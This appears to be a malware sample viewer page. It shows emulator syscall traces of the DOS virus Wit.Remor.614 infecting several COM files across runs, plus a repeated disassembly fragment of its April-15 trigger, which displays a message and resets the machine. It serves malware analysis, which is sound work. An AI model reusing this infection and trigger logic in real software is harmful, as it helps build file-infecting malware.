Sample viewer

vx.netlux.org/Virus.DOS.Wit.Remor.614

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:50:36.011291377Z 26 PC: 12a70 | Set disk transfer address
2018-12-17T22:50:36.0136672Z 71 PC: 12a82 | Get current directory
2018-12-17T22:50:36.017766501Z 42 PC: 12a88 | Get date 0x12a88: cmp dh, 4
0x12a8b: jne 0x12aa6
0x12a8d: cmp dl, 0xf
0x12a90: jne 0x12aa6
0x12a92: mov ax, 0x1010
0x12a95: out 0x70, ax
0x12a97: mov dx, 0x2fe
0x12a9a: mov ah, 9
0x12a9c: int 0x21
0x12a9e: mov ah, 8
0x12aa0: int 0x21
0x12aa2: mov al, 0xfe
0x12aa4: out 0x64, al
0x12aa6: mov ah, byte ptr [0x328]
0x12aaa: mov cl, 7
0x12aac: mov dx, 0x2f2
0x12aaf: int 0x21
0x12ab1: jae 0x12ab6
0x12ab3: jmp 0x12bed
0x12ab6: mov dx, word ptr [0x321]
2018-12-17T22:50:36.020602519Z 78 PC: 12ab1 | Find first file
2018-12-17T22:50:36.028176087Z 67 PC: 12acd | Get or set file attributes
2018-12-17T22:50:36.046686753Z 61 PC: 12ae1 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:50:36.054738519Z 63 PC: 12afd | Read file or device (Read 611 bytes on handle 5)
2018-12-17T22:50:36.062688785Z 66 PC: 12b1c | Move file pointer
2018-12-17T22:50:36.065371034Z 66 PC: 12b3f | Move file pointer
2018-12-17T22:50:36.067154815Z 64 PC: 12b5a | Write file or device (Write 407 bytes on handle 5)
2018-12-17T22:50:36.075875719Z 64 PC: 12b6a | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:50:36.080107218Z 66 PC: 12b99 | Move file pointer
2018-12-17T22:50:36.082009281Z 64 PC: 12baa | Write file or device (Write 611 bytes on handle 5)
2018-12-17T22:50:36.091055497Z 87 PC: 12bbb | Get or set file date and time
2018-12-17T22:50:36.094482425Z 62 PC: 12bc1 | Close file
2018-12-17T22:50:36.103074877Z 67 PC: 12bd3 | Get or set file attributes
2018-12-17T22:50:36.114263777Z 79 PC: 12ab1 | Find next file
2018-12-17T22:50:36.126626032Z 67 PC: 12acd | Get or set file attributes
2018-12-17T22:50:36.13839925Z 61 PC: 12ae1 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:50:36.146545564Z 63 PC: 12afd | Read file or device (Read 611 bytes on handle 5)
2018-12-17T22:50:36.154203841Z 66 PC: 12b1c | Move file pointer
2018-12-17T22:50:36.156162821Z 66 PC: 12b3f | Move file pointer
2018-12-17T22:50:36.157751095Z 64 PC: 12b5a | Write file or device (Write 27 bytes on handle 5)
2018-12-17T22:50:36.160953111Z 64 PC: 12b6a | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:50:36.166271001Z 66 PC: 12b99 | Move file pointer
2018-12-17T22:50:36.168421501Z 64 PC: 12baa | Write file or device (Write 611 bytes on handle 5)
2018-12-17T22:50:36.177882325Z 87 PC: 12bbb | Get or set file date and time
2018-12-17T22:50:36.182353074Z 62 PC: 12bc1 | Close file
2018-12-17T22:50:36.191093995Z 67 PC: 12bd3 | Get or set file attributes
2018-12-17T22:50:36.201893834Z 79 PC: 12ab1 | Find next file
2018-12-17T22:50:36.205721396Z 67 PC: 12acd | Get or set file attributes
2018-12-17T22:50:36.216443979Z 61 PC: 12ae1 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:50:36.223873126Z 63 PC: 12afd | Read file or device (Read 611 bytes on handle 5)
2018-12-17T22:50:36.232602095Z 66 PC: 12b1c | Move file pointer
2018-12-17T22:50:36.234633992Z 66 PC: 12b3f | Move file pointer
2018-12-17T22:50:36.237753253Z 64 PC: 12b5a | Write file or device (Write 92 bytes on handle 5)
2018-12-17T22:50:36.245923832Z 64 PC: 12b6a | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:50:36.249316185Z 66 PC: 12b99 | Move file pointer
2018-12-17T22:50:36.251173885Z 64 PC: 12baa | Write file or device (Write 611 bytes on handle 5)
2018-12-17T22:50:36.260460401Z 87 PC: 12bbb | Get or set file date and time
2018-12-17T22:50:36.262942605Z 62 PC: 12bc1 | Close file
2018-12-17T22:50:36.272629282Z 67 PC: 12bd3 | Get or set file attributes
2018-12-17T22:50:36.283538417Z 79 PC: 12ab1 | Find next file
2018-12-17T22:50:36.290185254Z 67 PC: 12acd | Get or set file attributes
2018-12-17T22:50:36.300599519Z 61 PC: 12ae1 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:50:36.308812108Z 63 PC: 12afd | Read file or device (Read 611 bytes on handle 5)
2018-12-17T22:50:36.31659545Z 66 PC: 12b1c | Move file pointer
2018-12-17T22:50:36.318797537Z 66 PC: 12b3f | Move file pointer
2018-12-17T22:50:36.321066801Z 64 PC: 12b5a | Write file or device (Write 29 bytes on handle 5)
2018-12-17T22:50:36.324087235Z 64 PC: 12b6a | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:50:36.326486833Z 66 PC: 12b99 | Move file pointer
2018-12-17T22:50:36.327745187Z 64 PC: 12baa | Write file or device (Write 611 bytes on handle 5)
2018-12-17T22:50:36.334582221Z 87 PC: 12bbb | Get or set file date and time
2018-12-17T22:50:36.336123908Z 62 PC: 12bc1 | Close file
2018-12-17T22:50:36.34259776Z 67 PC: 12bd3 | Get or set file attributes
2018-12-17T22:50:36.350543106Z 79 PC: 12ab1 | Find next file
2018-12-17T22:50:36.353160995Z 67 PC: 12acd | Get or set file attributes
2018-12-17T22:50:36.363714311Z 61 PC: 12ae1 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:50:36.371074388Z 63 PC: 12afd | Read file or device (Read 611 bytes on handle 5)
2018-12-17T22:50:36.379403105Z 66 PC: 12b1c | Move file pointer
2018-12-17T22:50:36.381286553Z 66 PC: 12b3f | Move file pointer
2018-12-17T22:50:36.383122612Z 64 PC: 12b5a | Write file or device (Write 29 bytes on handle 5)
2018-12-17T22:50:36.386685816Z 64 PC: 12b6a | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:50:36.3901319Z 66 PC: 12b99 | Move file pointer
2018-12-17T22:50:36.391964022Z 64 PC: 12baa | Write file or device (Write 611 bytes on handle 5)
2018-12-17T22:50:36.402041525Z 87 PC: 12bbb | Get or set file date and time
2018-12-17T22:50:36.404066358Z 62 PC: 12bc1 | Close file
2018-12-17T22:50:36.412899503Z 67 PC: 12bd3 | Get or set file attributes
2018-12-17T22:50:36.42480528Z 59 PC: 12bf6 | Change current directory
2018-12-17T22:50:36.42959571Z 26 PC: 12c13 | Set disk transfer address
2018-12-17T22:50:36.43109169Z 59 PC: 12c1e | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10286,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:27:39.620209781Z 26 PC: 12a70 | Set disk transfer address
2018-12-25T12:27:39.623054376Z 71 PC: 12a82 | Get current directory
2018-12-25T12:27:39.625998535Z 42 PC: 12a88 | Get date 0x12a88: cmp dh, 4
0x12a8b: jne 0x12aa6
0x12a8d: cmp dl, 0xf
0x12a90: jne 0x12aa6
0x12a92: mov ax, 0x1010
0x12a95: out 0x70, ax
0x12a97: mov dx, 0x2fe
0x12a9a: mov ah, 9
0x12a9c: int 0x21
0x12a9e: mov ah, 8
0x12aa0: int 0x21
0x12aa2: mov al, 0xfe
0x12aa4: out 0x64, al
0x12aa6: mov ah, byte ptr [0x328]
0x12aaa: mov cl, 7
0x12aac: mov dx, 0x2f2
0x12aaf: int 0x21
0x12ab1: jae 0x12ab6
0x12ab3: jmp 0x12bed
0x12ab6: mov dx, word ptr [0x321]
2018-12-25T12:27:39.628029874Z 78 PC: 12ab1 | Find first file
2018-12-25T12:27:39.634302421Z 67 PC: 12acd | Get or set file attributes
2018-12-25T12:27:39.650818327Z 61 PC: 12ae1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:27:39.657352776Z 63 PC: 12afd | Read file or device (Read 611 bytes on handle 5)
2018-12-25T12:27:39.663884853Z 66 PC: 12b1c | Move file pointer
2018-12-25T12:27:39.666473992Z 66 PC: 12b3f | Move file pointer
2018-12-25T12:27:39.668181844Z 64 PC: 12b5a | Write file or device (Write 407 bytes on handle 5)
2018-12-25T12:27:39.676334126Z 64 PC: 12b6a | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:27:39.68074494Z 66 PC: 12b99 | Move file pointer
2018-12-25T12:27:39.682413322Z 64 PC: 12baa | Write file or device (Write 611 bytes on handle 5)
2018-12-25T12:27:39.689991327Z 87 PC: 12bbb | Get or set file date and time
2018-12-25T12:27:39.692836524Z 62 PC: 12bc1 | Close file
2018-12-25T12:27:39.70124809Z 67 PC: 12bd3 | Get or set file attributes
2018-12-25T12:27:39.708636779Z 79 PC: 12ab1 | Find next file (See above)
2018-12-25T12:27:39.711237004Z 67 PC: 12acd | Get or set file attributes (See above)
2018-12-25T12:27:39.718930728Z 61 PC: 12ae1 | Open file (See above)
2018-12-25T12:27:39.725381849Z 63 PC: 12afd | Read file or device (See above)
2018-12-25T12:27:39.736820564Z 66 PC: 12b1c | Move file pointer (See above)
2018-12-25T12:27:39.738329885Z 66 PC: 12b3f | Move file pointer (See above)
2018-12-25T12:27:39.73998794Z 64 PC: 12b5a | Write file or device (See above)
2018-12-25T12:27:39.74313669Z 64 PC: 12b6a | Write file or device (See above)
2018-12-25T12:27:39.747105448Z 66 PC: 12b99 | Move file pointer (See above)
2018-12-25T12:27:39.748850854Z 64 PC: 12baa | Write file or device (See above)
2018-12-25T12:27:39.756855412Z 87 PC: 12bbb | Get or set file date and time (See above)
2018-12-25T12:27:39.759537403Z 62 PC: 12bc1 | Close file (See above)
2018-12-25T12:27:39.767443539Z 67 PC: 12bd3 | Get or set file attributes (See above)
2018-12-25T12:27:39.777071854Z 79 PC: 12ab1 | Find next file (See above)
2018-12-25T12:27:39.780646565Z 67 PC: 12acd | Get or set file attributes (See above)
2018-12-25T12:27:39.790076857Z 61 PC: 12ae1 | Open file (See above)
2018-12-25T12:27:39.796404379Z 63 PC: 12afd | Read file or device (See above)
2018-12-25T12:27:39.803251022Z 66 PC: 12b1c | Move file pointer (See above)
2018-12-25T12:27:39.804621785Z 66 PC: 12b3f | Move file pointer (See above)
2018-12-25T12:27:39.80595234Z 64 PC: 12b5a | Write file or device (See above)
2018-12-25T12:27:39.809453137Z 64 PC: 12b6a | Write file or device (See above)
2018-12-25T12:27:39.812578366Z 66 PC: 12b99 | Move file pointer (See above)
2018-12-25T12:27:39.81414236Z 64 PC: 12baa | Write file or device (See above)
2018-12-25T12:27:39.822448575Z 87 PC: 12bbb | Get or set file date and time (See above)
2018-12-25T12:27:39.824739234Z 62 PC: 12bc1 | Close file (See above)
2018-12-25T12:27:39.832692132Z 67 PC: 12bd3 | Get or set file attributes (See above)
2018-12-25T12:27:39.842242304Z 79 PC: 12ab1 | Find next file (See above)
2018-12-25T12:27:39.845180235Z 67 PC: 12acd | Get or set file attributes (See above)
2018-12-25T12:27:39.855016495Z 61 PC: 12ae1 | Open file (See above)
2018-12-25T12:27:39.861746093Z 63 PC: 12afd | Read file or device (See above)
2018-12-25T12:27:39.868622557Z 66 PC: 12b1c | Move file pointer (See above)
2018-12-25T12:27:39.870097552Z 66 PC: 12b3f | Move file pointer (See above)
2018-12-25T12:27:39.871601984Z 64 PC: 12b5a | Write file or device (See above)
2018-12-25T12:27:39.87486343Z 64 PC: 12b6a | Write file or device (See above)
2018-12-25T12:27:39.877735816Z 66 PC: 12b99 | Move file pointer (See above)
2018-12-25T12:27:39.87938562Z 64 PC: 12baa | Write file or device (See above)
2018-12-25T12:27:39.887967361Z 87 PC: 12bbb | Get or set file date and time (See above)
2018-12-25T12:27:39.889720353Z 62 PC: 12bc1 | Close file (See above)
2018-12-25T12:27:39.897777194Z 67 PC: 12bd3 | Get or set file attributes (See above)
2018-12-25T12:27:39.90793737Z 79 PC: 12ab1 | Find next file (See above)
2018-12-25T12:27:39.91049801Z 67 PC: 12acd | Get or set file attributes (See above)
2018-12-25T12:27:39.919627009Z 61 PC: 12ae1 | Open file (See above)
2018-12-25T12:27:39.926434518Z 63 PC: 12afd | Read file or device (See above)
2018-12-25T12:27:39.932749244Z 66 PC: 12b1c | Move file pointer (See above)
2018-12-25T12:27:39.934203088Z 66 PC: 12b3f | Move file pointer (See above)
2018-12-25T12:27:39.936549526Z 64 PC: 12b5a | Write file or device (See above)
2018-12-25T12:27:39.939110677Z 64 PC: 12b6a | Write file or device (See above)
2018-12-25T12:27:39.942054232Z 66 PC: 12b99 | Move file pointer (See above)
2018-12-25T12:27:39.94365499Z 64 PC: 12baa | Write file or device (See above)
2018-12-25T12:27:39.948792044Z 87 PC: 12bbb | Get or set file date and time (See above)
2018-12-25T12:27:39.949698944Z 62 PC: 12bc1 | Close file (See above)
2018-12-25T12:27:39.955179351Z 67 PC: 12bd3 | Get or set file attributes (See above)
2018-12-25T12:27:39.9631678Z 59 PC: 12bf6 | Change current directory
2018-12-25T12:27:39.967101957Z 26 PC: 12c13 | Set disk transfer address
2018-12-25T12:27:39.96829484Z 59 PC: 12c1e | Change current directory

{"DateBased":true,"Day":1,"Month":4,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10286,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:27:39.647923297Z 26 PC: 12a70 | Set disk transfer address
2018-12-25T12:27:39.650119677Z 71 PC: 12a82 | Get current directory
2018-12-25T12:27:39.652492317Z 42 PC: 12a88 | Get date 0x12a88: cmp dh, 4
0x12a8b: jne 0x12aa6
0x12a8d: cmp dl, 0xf
0x12a90: jne 0x12aa6
0x12a92: mov ax, 0x1010
0x12a95: out 0x70, ax
0x12a97: mov dx, 0x2fe
0x12a9a: mov ah, 9
0x12a9c: int 0x21
0x12a9e: mov ah, 8
0x12aa0: int 0x21
0x12aa2: mov al, 0xfe
0x12aa4: out 0x64, al
0x12aa6: mov ah, byte ptr [0x328]
0x12aaa: mov cl, 7
0x12aac: mov dx, 0x2f2
0x12aaf: int 0x21
0x12ab1: jae 0x12ab6
0x12ab3: jmp 0x12bed
0x12ab6: mov dx, word ptr [0x321]
2018-12-25T12:27:39.654353505Z 78 PC: 12ab1 | Find first file
2018-12-25T12:27:39.670313507Z 67 PC: 12acd | Get or set file attributes
2018-12-25T12:27:39.687298662Z 61 PC: 12ae1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:27:39.699137388Z 63 PC: 12afd | Read file or device (Read 611 bytes on handle 5)
2018-12-25T12:27:39.706116044Z 66 PC: 12b1c | Move file pointer
2018-12-25T12:27:39.707697091Z 66 PC: 12b3f | Move file pointer
2018-12-25T12:27:39.709081243Z 64 PC: 12b5a | Write file or device (Write 407 bytes on handle 5)
2018-12-25T12:27:39.717104918Z 64 PC: 12b6a | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:27:39.723276568Z 66 PC: 12b99 | Move file pointer
2018-12-25T12:27:39.724558456Z 64 PC: 12baa | Write file or device (Write 611 bytes on handle 5)
2018-12-25T12:27:39.731989547Z 87 PC: 12bbb | Get or set file date and time
2018-12-25T12:27:39.734196783Z 62 PC: 12bc1 | Close file
2018-12-25T12:27:39.741845176Z 67 PC: 12bd3 | Get or set file attributes
2018-12-25T12:27:39.751698293Z 79 PC: 12ab1 | Find next file (See above)
2018-12-25T12:27:39.759171015Z 67 PC: 12acd | Get or set file attributes (See above)
2018-12-25T12:27:39.769823584Z 61 PC: 12ae1 | Open file (See above)
2018-12-25T12:27:39.777022844Z 63 PC: 12afd | Read file or device (See above)
2018-12-25T12:27:39.784677015Z 66 PC: 12b1c | Move file pointer (See above)
2018-12-25T12:27:39.786444842Z 66 PC: 12b3f | Move file pointer (See above)
2018-12-25T12:27:39.788193972Z 64 PC: 12b5a | Write file or device (See above)
2018-12-25T12:27:39.791482408Z 64 PC: 12b6a | Write file or device (See above)
2018-12-25T12:27:39.794738321Z 66 PC: 12b99 | Move file pointer (See above)
2018-12-25T12:27:39.796483673Z 64 PC: 12baa | Write file or device (See above)
2018-12-25T12:27:39.805813357Z 87 PC: 12bbb | Get or set file date and time (See above)
2018-12-25T12:27:39.807482421Z 62 PC: 12bc1 | Close file (See above)
2018-12-25T12:27:39.815511457Z 67 PC: 12bd3 | Get or set file attributes (See above)
2018-12-25T12:27:39.825463702Z 79 PC: 12ab1 | Find next file (See above)
2018-12-25T12:27:39.834495446Z 67 PC: 12acd | Get or set file attributes (See above)
2018-12-25T12:27:39.844610328Z 61 PC: 12ae1 | Open file (See above)
2018-12-25T12:27:39.85146796Z 63 PC: 12afd | Read file or device (See above)
2018-12-25T12:27:39.858757684Z 66 PC: 12b1c | Move file pointer (See above)
2018-12-25T12:27:39.860515831Z 66 PC: 12b3f | Move file pointer (See above)
2018-12-25T12:27:39.862305925Z 64 PC: 12b5a | Write file or device (See above)
2018-12-25T12:27:39.866425689Z 64 PC: 12b6a | Write file or device (See above)
2018-12-25T12:27:39.869728895Z 66 PC: 12b99 | Move file pointer (See above)
2018-12-25T12:27:39.871167566Z 64 PC: 12baa | Write file or device (See above)
2018-12-25T12:27:39.879471005Z 87 PC: 12bbb | Get or set file date and time (See above)
2018-12-25T12:27:39.880936837Z 62 PC: 12bc1 | Close file (See above)
2018-12-25T12:27:39.888381886Z 67 PC: 12bd3 | Get or set file attributes (See above)
2018-12-25T12:27:39.898980212Z 79 PC: 12ab1 | Find next file (See above)
2018-12-25T12:27:39.901598751Z 67 PC: 12acd | Get or set file attributes (See above)
2018-12-25T12:27:39.912027502Z 61 PC: 12ae1 | Open file (See above)
2018-12-25T12:27:39.919376003Z 63 PC: 12afd | Read file or device (See above)
2018-12-25T12:27:39.925797158Z 66 PC: 12b1c | Move file pointer (See above)
2018-12-25T12:27:39.927116843Z 66 PC: 12b3f | Move file pointer (See above)
2018-12-25T12:27:39.929526109Z 64 PC: 12b5a | Write file or device (See above)
2018-12-25T12:27:39.932031933Z 64 PC: 12b6a | Write file or device (See above)
2018-12-25T12:27:39.93485733Z 66 PC: 12b99 | Move file pointer (See above)
2018-12-25T12:27:39.938056271Z 64 PC: 12baa | Write file or device (See above)
2018-12-25T12:27:39.946084899Z 87 PC: 12bbb | Get or set file date and time (See above)
2018-12-25T12:27:39.94795255Z 62 PC: 12bc1 | Close file (See above)
2018-12-25T12:27:39.956479236Z 67 PC: 12bd3 | Get or set file attributes (See above)
2018-12-25T12:27:39.966686379Z 79 PC: 12ab1 | Find next file (See above)
2018-12-25T12:27:39.969444038Z 67 PC: 12acd | Get or set file attributes (See above)
2018-12-25T12:27:39.979405045Z 61 PC: 12ae1 | Open file (See above)
2018-12-25T12:27:39.985961968Z 63 PC: 12afd | Read file or device (See above)
2018-12-25T12:27:39.992242477Z 66 PC: 12b1c | Move file pointer (See above)
2018-12-25T12:27:39.994689493Z 66 PC: 12b3f | Move file pointer (See above)
2018-12-25T12:27:39.996102563Z 64 PC: 12b5a | Write file or device (See above)
2018-12-25T12:27:39.998758267Z 64 PC: 12b6a | Write file or device (See above)
2018-12-25T12:27:40.00239909Z 66 PC: 12b99 | Move file pointer (See above)
2018-12-25T12:27:40.003819767Z 64 PC: 12baa | Write file or device (See above)
2018-12-25T12:27:40.011563624Z 87 PC: 12bbb | Get or set file date and time (See above)
2018-12-25T12:27:40.013221407Z 62 PC: 12bc1 | Close file (See above)
2018-12-25T12:27:40.020983114Z 67 PC: 12bd3 | Get or set file attributes (See above)
2018-12-25T12:27:40.031199446Z 59 PC: 12bf6 | Change current directory
2018-12-25T12:27:40.035382605Z 26 PC: 12c13 | Set disk transfer address
2018-12-25T12:27:40.036736842Z 59 PC: 12c1e | Change current directory

{"DateBased":true,"Day":15,"Month":4,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10286,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:27:41.776863707Z 26 PC: 12a70 | Set disk transfer address
2018-12-25T12:27:41.778418797Z 71 PC: 12a82 | Get current directory
2018-12-25T12:27:41.781703229Z 42 PC: 12a88 | Get date 0x12a88: cmp dh, 4
0x12a8b: jne 0x12aa6
0x12a8d: cmp dl, 0xf
0x12a90: jne 0x12aa6
0x12a92: mov ax, 0x1010
0x12a95: out 0x70, ax
0x12a97: mov dx, 0x2fe
0x12a9a: mov ah, 9
0x12a9c: int 0x21
0x12a9e: mov ah, 8
0x12aa0: int 0x21
0x12aa2: mov al, 0xfe
0x12aa4: out 0x64, al
0x12aa6: mov ah, byte ptr [0x328]
0x12aaa: mov cl, 7
0x12aac: mov dx, 0x2f2
0x12aaf: int 0x21
0x12ab1: jae 0x12ab6
0x12ab3: jmp 0x12bed
0x12ab6: mov dx, word ptr [0x321]
2018-12-25T12:27:41.784082254Z 9 PC: 12a9e | Display string (String= '��ࠡ���� - rulez forever ! ')
2018-12-25T12:27:41.788505792Z 8 PC: 12aa2 | Console input without echo